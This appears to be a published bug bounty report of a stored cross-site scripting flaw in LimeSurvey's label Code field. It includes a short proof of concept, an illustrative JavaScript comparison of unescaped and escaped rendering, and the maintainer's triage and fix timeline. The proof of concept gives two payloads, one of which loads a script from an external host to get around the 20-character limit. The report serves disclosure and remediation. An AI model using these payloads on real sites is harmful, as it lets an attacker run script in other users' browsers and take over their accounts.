Stored XSS in label function in limesurvey/limesurvey

Valid

Reported on

Jun 28th 2023


Description

By injecting a payload into the label Code field (sent in the `dataToSend` parameter), an attacker can have it stored and rendered unescaped, so users who visit the "Label sets list" screen may be compromised.

Proof of Concept

Step 1: Log in as a user who has permission to edit labels. Go to the label function and view a label.

Step 2: Inject the payload below into the Code field (as in the report's screenshot) and click Save.

<svg onload=alert()>

Step 3: The payload is then triggered

However, the maximum length of the field is 20 characters. I can still exploit this vulnerability with the following payload for a blind XSS:

<script src=//₨₨.pw>
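The rendering pattern the report describes, as an added example (not LimeSurvey's own code and not the fix in the referenced commit): a label row is built by interpolating the stored Code value straight into the list markup, so the 20-character limit is the only thing standing between the attacker and script execution, and both payloads above fit within it. The `LABELS` rows, the 20-character `CODE_MAX_LEN` constant and the table layout are constructed assumptions; the hardened renderer HTML-encodes every user-controlled value before it reaches element content.

```javascript
// Added example, not LimeSurvey code: a label "Code" value reaching the
// "Label sets list" markup unescaped, next to the encoded version.

const CODE_MAX_LEN = 20; // assumption: the field limit stated in the report

// Constructed sample label rows, as a user with label-edit permission could save them.
const LABELS = [
  { code: "AA1", title: "Agree" },
  { code: "<svg onload=alert()>", title: "Strongly agree" },
  { code: "<script src=//₨₨.pw>", title: "Disagree" },
];

// Minimal HTML entity encoding for text placed inside an element body.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable: the stored Code value is concatenated into markup as-is.
function renderRowVulnerable(label) {
  return `<tr><td>${label.code}</td><td>${label.title}</td></tr>`;
}

// Hardened: every attacker-controlled field is encoded before insertion.
function renderRowSafe(label) {
  return `<tr><td>${escapeHtml(label.code)}</td><td>${escapeHtml(label.title)}</td></tr>`;
}

// The length limit is not a security control: both payloads pass it.
// Counts code points, so the single-code-point ₨ sign costs one character.
function fitsCodeLimit(code) {
  return [...code].length <= CODE_MAX_LEN;
}

// Check a rendered row for a raw tag opener left inside a cell, which is
// what a browser would parse as an element rather than as text.
function cellsContainMarkup(rowHtml) {
  const cells = [...rowHtml.matchAll(/<td>(.*?)<\/td>/gs)].map((m) => m[1]);
  return cells.some((cell) => /<[a-z]/i.test(cell));
}

// Render the whole list both ways and report which rows still carry markup.
function auditLabels(labels) {
  return labels.map((label) => ({
    code: label.code,
    withinLimit: fitsCodeLimit(label.code),
    vulnerableRowHasMarkup: cellsContainMarkup(renderRowVulnerable(label)),
    safeRowHasMarkup: cellsContainMarkup(renderRowSafe(label)),
  }));
}

console.table(auditLabels(LABELS));
```

Both payloads come back as `withinLimit: true` and only the vulnerable renderer leaves markup in the cell; the second payload works as a blind probe because the browser applies hostname normalization to the `₨₨.pw` label, so a 20-character Code still loads an external script.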

Impact

If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user. The attacker can carry out any of the actions that are applicable to the impact of reflected XSS vulnerabilities.

We are processing your report and will contact the limesurvey team within 24 hours. 3 months ago
tuannq2299 modified the report
3 months ago
We have contacted a member of the limesurvey team and are waiting to hear back 3 months ago
Carsten Schmitz
3 months ago

Maintainer


Please be patient while we verify the issue. Internal reference number: #18934

tuannq2299
3 months ago

Researcher


Is there any update?

Carsten Schmitz modified the Severity from High (7.1) to Medium (4.6) 2 months ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Carsten Schmitz validated this vulnerability 2 months ago
tuannq2299 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Carsten Schmitz marked this as fixed in 6.1.7 with commit 184d50 2 months ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
Carsten Schmitz published this vulnerability 2 months ago